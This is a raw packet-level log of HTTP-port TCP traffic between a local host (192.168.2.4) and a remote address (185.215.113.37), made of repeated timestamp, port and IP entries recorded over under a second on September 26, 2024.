Sep 26, 2024 00:39:13.625791073 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.625791073 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.625814915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625825882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625837088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625847101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625857115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625865936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625865936 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.625865936 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.625865936 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.625878096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625890970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625900030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625933886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625940084 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.625940084 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.625942945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625962019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625973940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625983953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.626003981 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.626003981 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.626060963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.626089096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.626107931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.626117945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.626130104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.626133919 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.626142025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.626154900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.626164913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.626176119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.626178980 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.626185894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.626197100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.626204014 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.626208067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.626219034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.626219988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.626230955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.626240969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.626251936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.626262903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.626266003 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.626272917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.626279116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.626295090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.626295090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.626415014 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.626456976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.626467943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.626478910 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.626488924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.626501083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.626511097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.626527071 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.626528025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.626595020 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.656022072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.656045914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.656059027 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.656107903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.656120062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.656132936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.656143904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.656156063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.656239033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.656239033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.732048988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.732083082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.732093096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.732110023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.732120991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.732122898 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.732132912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.732191086 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.732192039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.732743979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.732832909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.732871056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.732872963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.732902050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.732913017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.732914925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.732960939 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.732960939 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.734944105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.734956026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.734967947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.734983921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.735030890 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.735030890 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.735210896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.735268116 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.735289097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.735301971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.735312939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.735344887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.735358953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.735368967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.735372066 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.735379934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.735403061 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.735583067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.735599041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.735609055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.735610008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.735620022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.735631943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.735641956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.735642910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.735642910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.735652924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.735663891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.735681057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.735692024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.735702038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.735702991 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.735702991 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.735713959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.735730886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.735742092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.735748053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.735748053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.735935926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.736012936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.736041069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.736052036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.736087084 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.736097097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.736108065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.736156940 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.736156940 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.736157894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.736175060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.736186028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.736196041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.736206055 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.736206055 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.736210108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.736222982 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.736295938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.736324072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.736339092 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.736340046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.736351967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.736361980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.736382008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.736510038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.736546040 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.736546040 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.736557961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.736567974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.736605883 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.736605883 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.736623049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.736634016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.736644030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.736659050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.736670017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.736692905 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.736692905 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.736808062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.736819029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.736835957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.736840010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.736840010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.736860037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.736871004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.736874104 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.736874104 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.736887932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.736908913 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.736908913 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.737148046 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.744483948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.744508028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.744518995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.744549036 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.744668961 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.782205105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.782232046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.782244921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.782272100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.782283068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.782294035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.782300949 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.782300949 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.782303095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.782318115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.782336950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.782346010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.782356977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.782356977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.783425093 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.856261015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.856273890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.856287003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.856298923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.856309891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.856321096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.856331110 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.856369972 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.856369972 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.856949091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.856966972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.856976986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.857068062 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.857068062 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.859067917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.859147072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.859158993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.859169960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.859216928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.859241962 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.859241962 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.859252930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.859262943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.859294891 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.859294891 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.859306097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.859348059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.859363079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.859374046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.859390974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.859401941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.859419107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.859419107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.859447956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.859616041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.859627008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.859637022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.859662056 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.859674931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.859685898 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.859687090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.859700918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.859738111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.859738111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.859746933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.859756947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.859767914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.859819889 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.859819889 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.859862089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.859908104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.859919071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.859944105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.859963894 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.859963894 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.860018015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.860075951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.860089064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.860125065 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.860177994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.860189915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.860199928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.860210896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.860240936 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.860240936 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.860263109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.860280991 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.860325098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.860337019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.860361099 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.860361099 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.860373974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.860384941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.860394955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.860403061 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.860407114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.860419035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.860438108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.860441923 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.860441923 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.860480070 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.860480070 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.860493898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.860502958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.860541105 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.860609055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.860647917 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.860651970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.860665083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.860687017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.860699892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.860707045 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.860707045 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.860743046 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.860743046 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.860800028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.860850096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.860858917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.860882044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.860891104 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.861073971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.861084938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.861094952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.861105919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.861131907 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.861131907 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.861232996 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.868834019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.868846893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.868858099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.869071007 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.908459902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.908478022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.908489943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.908521891 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.908555031 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.908679962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.908689976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.908739090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.908755064 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.908755064 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.908788919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.908799887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.908816099 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.908834934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.908847094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.908873081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.908873081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.908896923 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.980341911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.980379105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.980389118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.980407000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.980417967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.980428934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.980468988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.980469942 CEST	49730	80	192.168.2.4	185.215.113.37
